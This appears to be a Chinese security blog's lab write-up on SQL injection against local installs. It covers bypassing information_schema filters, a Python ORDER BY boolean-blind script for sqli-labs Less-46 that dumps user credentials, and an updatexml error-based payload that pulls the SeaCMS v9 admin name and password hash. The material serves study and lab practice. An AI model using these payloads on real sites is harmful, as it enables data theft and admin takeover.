过滤information_schema解决方案+order by 布尔盲注+seacmsv9 SQL注入漏洞

于 2025-03-10 19:07:41 发布
阅读量935 收藏 9
点赞数 29
CC 4.0 BY-SA版权
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2302_79839801/article/details/146161432

一.过滤information_schema解决方案:

1. 替代系统表或视图

如果 information_schema 被直接过滤,可以使用其他系统表或视图来获取元数据,但有版本限制

(1) 使用 sys 数据库(MySQL 5.7+)

--获取所有表名
 
SELECT table_name FROM sys.schema_auto_increment_columns WHERE table_schema = DATABASE();
 
--获取所有列名
 
SELECT table_name, column_name FROM sys.schema_columns WHERE table_schema = DATABASE();

2.编码混淆绕过
(1)URL编码

将 information_schema 转换为 URL 编码

SELECT table_name FROM %69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61.tables WHERE table_schema=DATABASE();

(2) Unicode 编码

SELECT table_name FROM information\u005f_schema.tables WHERE table_schema=DATABASE();

3. 关键字分割

通过空格、换行符或特殊字符分割 information_schema:

SELECT table_name FROM information/**/_schema.tables WHERE table_schema=DATABASE();

二,SQL注入之ORDER BY注入

1.ORDER BY子句的用法

在MySQL中支持使用ORDER BY语句对查询结果集进行排序处理。使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。语法格式如下:

select * from 表名 order by 列名(或者数字) asc;升序(默认升序) 
select * from 表名 order by 列名(或者数字) desc;降序

order by还支持多个字段自定义排序,通过逗号隔开,但只能在数字之间进行自定义排序,若选择字符类型则会根据第一个列名的排序规则进行排序。

2.order by 布尔盲注

环境介绍:
sqlilabs靶场第46关,参数sort传入id,如下

参数sort传入username,如下


 看源码可知,sort前面是order by,通过sort传入的字段排序

布尔盲注

于是用sort=if(表达式,id,username)的方式注入,通过BeautifulSoup爬取表格中username下一格的
值是否等于Dumb来判断表达式的真假,并使用二分查找加快注入速度,从而实现boolen(布尔)
注入,具体代码如下

import requests
from bs4 import BeautifulSoup
 
def get_username(resp):
    soup = BeautifulSoup(resp,'html.parser')
    username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
    return username
 
def inject_database_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost:81/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr(database(),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)
 
def inject_table_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost:81/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(table_name) from \
                information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)
 
def inject_column_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost:81/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(column_name) from \
                information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)
 
def inject_data_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost:81/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(username,':',password) \
                from users),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)
 
if __name__ == '__main__':
    # inject_database_boolen()
    # inject_table_boolen()
    # inject_column_boolen()
    inject_data_boolen()

注入结果如下

三,seacmsv9 SQL注入漏洞,实现注入管理员和密码

seacms漏洞介绍海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,采 用的是 php5.X+mysql 的架构,seacmsv9漏洞文件:./comment/api/index.php,漏洞参数:$rlist

漏洞绕过

由于seacms开源,可以知道seacmsv9系统数据库(mysql)为seacms,存放管理员账号的表为
sea_admin,表中存放管理员姓名的字段为name,存放管理员密码的字段为password

经过源码分析,使用以下语句注入(limit避免管理员有多个,导致SQL语句报错):
name:
http://localhost/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml
(1,concat_ws(0x20,0x5c,(select name from%23%0asea_admin limit 0,1)),1), @`'`
第一次尝试:
结果如下:

并没有成功,使用Wireshark抓包发现最终执行的SQL为:
SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment 
WHERE m_type=1 AND id in (@`\'`, updatexml(1,concat_ws(0x20,0x5c,(select name from#
sea_admin limit 0,1)),1), @`\'`) ORDER BY id DESC

在mysql数据库中执行这个SQL语句,并没有报错报出管理员姓名

SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment 
WHERE m_type=1 AND id in (@`\'`, updatexml(1,concat_ws(0x20,0x5c,(select name from#
sea_admin limit 0,1)),1), @`\'`) ORDER BY id DESC

而下面修改为查询database()却能报出数据库名

经过查阅资料,发现是前面sea_comment表没数据(上图),导致并没有执行报错中的
查询语句,而database()能执行,应该是优先执行的问题,而sea_comment表中应该是
有数据的,于是就插入了一条数据,但发现还是没有执行,于是又插入了一条数据,发
现可以执行了

 最后,再次在地址栏尝试注入语句,成功注入出账号为admin

password:
http://localhost/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml
(1,concat_ws(0x20,0x5c,(select password from%23%0asea_admin limit 0,1)),1), @`'`
密码同理

注入密码为23a7bbd73250516f069d,可以看出是经过md5加密的,于是到https://cmd5.com/
解密,得到密码为admin123
最后得到管理员账号为admin,密码为admin123
  

简约海
关注
order by /limit注入 以及宽字节注入
m0_57581503的博客
08-10 334
顾名思义,注入点出现在oder by后面即可称为order by 注入当desc此处位置参数可控时,即有可能存在oreder by注入,那么如何在这样的情况下注出我们想要的数据呢?1.如果有报错信息输出,可尝试通过报错注入完成sql注入攻击2.如果没有回显,可尝试盲注的手法来注入。...
seacmsv9 SQL注入漏洞+order by 布尔盲注+过滤information_schema解决方案
UilQi的博客
02-21 605
海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,采用的是 php5.X+mysql 的架构,seacmsv9漏洞文件:./comment/api/index.php,漏洞参数:$rlistsqlilabs靶场第46关,参数sort传入id,如下参数sort传入username,如下看源码可知,sort前面是order by,通过sort传入的字段排序。
探索SeACMS:一个创新的内容管理系统
gitblog_00027的博客
04-08 623
探索SeACMS:一个创新的内容管理系统 是一款强大的开源内容管理系统,专为现代互联网应用设计,旨在提供高效、灵活且易于维护的内容管理解决方案。这篇技术解析将带你深入了解其核心特性、工作原理以及如何利用它来构建和管理你的在线内容。 技术分析 架构设计 SeACMS 基于前后端分离的设计理念,前端采用现代化的JavaScript框架(如React或Vue),后端则是基于稳定可靠的Python Dja...
海洋CMS源码
aheyor的博客
10-22 729
关于安装和配置,海洋CMS支持多种服务器环境,包括Windows平台的IIS/Apache/Nginx PHP(5.x) MySQL(5.x),以及Linux/Unix平台的Apache/Nginx PHP (5.x) MySQL(5.x)。它以其简单、快速、稳定的特点而闻名,并且完全开源,没有加密代码,使其更加安全。最新版本为V13,发布于2024年7月10日,支持PHP(5.x/7.x)和MySQL/MariaDB运行环境1。它基于PHPMySql技术开发,完全开源,功能强劲,性能卓越,安全健壮5。
seacms漏洞
2201_75544326的博客
03-03 371
海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,采用的是 php5.X+mysql 的架构,seacmsv9漏洞文件:./comment/api/index.php,漏洞参数:$rlist。
墨者学院-SQL注入漏洞测试(布尔盲注
weixin_42939822的博客
03-20 4481
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
SQL注入—盲注(一)布尔盲注
xiaoyang886_的博客
06-10 791
id=1' order by 1--+没变化 id=1' order by 2--+没变化 id=1' order by 3--+没变化?and (ascii(substr(database(),1,1)))=115--+ 返回正常,说明数据库名称第一位是 s。
SQL注入——布尔盲注
TGFXK的博客
03-21 423
原理:前面几关都有数据回显,而在有的界面不会回显数据,只会显示对错,此时查库名等就比较难查,只能根据猜对错来判断。
[墨者学院]SQL注入漏洞测试(布尔盲注)
m0_60945802的博客
03-22 4311
sql注入判断出了回显位置但是查找information_schema库找不到数据表
最新发布
07-13
</think>### SQL注入中无法从information_schema获取数据表的解决方案SQL注入点已确认回显位置但无法从`information_schema`获取数据表时,通常由以下原因导致: 1. **权限不足** 当前数据库用户可能缺少`...
seacms海洋cms影视管理系统 v9.1.zip
07-07
seacms海洋cms影视管理系统 v9.1 更新日志 更新日期:2019年2月1日 v9.1 优化:服务器开启OPcache时后台设置兼容性 优化:视频编辑时剧情分类显示方式 优化:剧情分类缓存项 seacms海洋影视管理系统简介 海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 海洋cms采用PHP MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。海洋cms支持一键转换原max的模板和数据,实现网站无缝迁移到新平台。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持按分类 扩展分类 剧情分类三种分类模式组合,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。 海洋cms是基于PHP MySql技术开发的开源CMS,完全开源 、没有任何加密代码,强劲功能、卓越性能、安全健壮。超级易用、模板众多、插件齐全、资源丰富。构架稳健,平滑升级。 seacms海洋影视管理系统前台页面 seacms海洋影视管理系统后台管理 后台路径:域名//admin 用户名与密码:admin(安装时可设置) 后台页面:  相关阅读 同类推荐:站长常用源码
seacms 远程命令执行 (CNVD-2020-22721)漏洞复现
weixin_42675091的博客
09-06 1876
seacms 远程命令执行 (CNVD-2020-22721)漏洞复现
SeaCMS海洋影视管理系统远程代码执行漏洞复现
holyxp的博客
07-27 3137
所以就去到http://192.168.1.57/SeaCMS_12.9/Upload/install/index.php这个文件来进行安装操作,打开此url会出现下面的界面,然后点击右下角的开始。因为我们是直接在这里安装的,保存了我们的cookie所以我们就直接进来了,如果没有直接进来也不要紧,直接弱密码账户admin 密码admin就行了。很明显我们输入的双引号把变量前面的内容给闭合了,然后后面有双斜杠直接注释了后方的内容,所以就导致了我们利用蚁剑来正向shell。然后下面的随便填,就像这样子。
seacms海洋cms漏洞
YouthBelief的博客
10-29 7109
seacms海洋cms漏洞前言一、seacms 远程命令执行 (CNVD-2020-22721)0x01 漏洞描述0x02 漏洞利用拿shell总结 前言 海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 一、seacms 远程命令执行 (CNVD-2020-22721) 0x01 漏洞描述 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台
SeaCMS V9海洋影视管理系统报错注入
weixin_73921499的博客
02-24 529
SQL 注入攻击是当前网络安全中最常见的一种攻击方式,攻击者可以利用该漏洞访问或操作数据库,造成数据泄露或破坏。在 SeaCMS V9 中,用户输入(如登录、评论、分页、ID 等)未经过适当的验证和清理,直接嵌入到 SQL 查询中,导致了 SQL 注入攻击的发生。变量没有经过适当的验证或清理,可以通过修改这些参数来执行恶意的 SQL 查询,从而导致 SQL 注入攻击。是由用户输入的,并且没有经过验证或过滤,可以传递恶意的输入来执行 SQL 注入攻击。变量直接用于 SQL 查询,如果。
information_schema过滤与无列名注入
snowlyzz的博客
09-06 1452
information_schema过滤与无列名注入
sql注入获取网站后台管理员账号与密码
热门推荐
longanquan的博客
07-27 1万+
利用联合查询获取cms 网站后台管理员帐密 环境介绍 物理机:Firefox浏览器(上加入hackbar插件) win2008虚拟机:搭建有cms网站(不会搭建的可以看我前面的博客) 判断网站是否存在sql注入漏洞 我们用物理机的Firefox浏览器访问虚拟机上的cms网站,F12打开开发者工具,在后面可以看到hackbar工具,点到该工具窗口。 首先我们先用最简单的方法判断是否存在漏洞。我们需要把地址框中的内容复制到hackbar框中,更改id的值,如果数据库中的内容回显到网页中,说明存在漏洞。 很
Seacms漏洞
Grey的博客
07-10 5210
海洋CMS6.45前台getshell漏洞复现结果:http://127.0.0.1/CMS/seacms_v6.4/upload/search.phppost:searchtype=5&amp;order=}{end if} {if:1)phpinfo();if(1}{end if}1.漏洞的触发点是在search.php 中的echoSearchPage()函数可以触发漏洞。常规的分析都是先找...
SeaCms(海洋CMS)采集插件教程
zhugedz的博客
05-21 662
资源库地址:http://www.xxx.vip/api.php/provide/vod/at/xml/?ac=list 点击【增加】按钮即可,具体操作如下图。请按以下步骤进行:依次点击【采集】-【资源库管理】,然后依次输入 资源库名称:某某资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值